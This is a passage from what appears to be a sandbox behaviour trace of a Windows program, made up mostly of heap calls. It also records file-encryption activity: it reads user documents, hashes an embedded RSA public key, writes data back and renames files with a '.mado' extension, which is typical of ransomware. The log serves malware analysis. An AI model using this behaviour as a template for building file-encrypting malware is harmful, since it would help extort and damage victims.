hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdff8 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe010 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfe0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe028 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdff8 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdff8 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe070 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0204.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdff8 | out: hHeap=0x2c0000) returned 1 [0204.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfe0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfc8 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e3f0 | out: hHeap=0x2c0000) returned 1 [0204.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.047] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x10739, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x10739, lpOverlapped=0x0) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.047] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1073e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.047] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6ee98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6ee98*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff0c0 [0204.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0204.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b70b68 [0204.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff0c0 | out: hHeap=0x2c0000) returned 1 [0204.048] WriteFile (in: hFile=0x63c, lpBuffer=0x3b70b68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b70b68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.048] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.048] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.048] CloseHandle (hObject=0x63c) returned 1 [0204.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0204.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b70b68 [0204.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2c88 | out: hHeap=0x2c0000) returned 1 [0204.049] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kcEMhu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kcemhu.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kcEMhu.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kcemhu.xlsx.mado")) returned 1 [0204.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.050] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.051] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3e0e0, ftCreationTime.dwHighDateTime=0x1d5deb0, ftLastAccessTime.dwLowDateTime=0x87ee8ce0, ftLastAccessTime.dwHighDateTime=0x1d5e816, ftLastWriteTime.dwLowDateTime=0x87ee8ce0, ftLastWriteTime.dwHighDateTime=0x1d5e816, nFileSizeHigh=0x0, nFileSizeLow=0x1278e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LYGm7s5W9niIJnIJRT.docx", cAlternateFileName="LYGM7S~1.DOC")) returned 1 [0204.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff0c0 [0204.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff0c0 | out: hHeap=0x2c0000) returned 1 [0204.051] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LYGm7s5W9niIJnIJRT.docx") returned=".docx" [0204.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LYGm7s5W9niIJnIJRT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lygm7s5w9niijnijrt.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.053] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=75662) returned 1 [0204.053] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.055] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.055] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.056] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.056] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1278e, lpOverlapped=0x0) returned 1 [0204.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.057] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.058] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.058] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.058] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.058] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.058] GetLastError () returned 0x0 [0204.058] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.058] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.058] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.058] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.059] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12790) returned 0x3b80690 [0204.059] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e3f0 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfc8 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e438 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfe0 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe010 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe028 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.059] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70b68 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe028 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe010 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.060] GetCurrentThreadId () returned 0x600 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x324630 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.061] 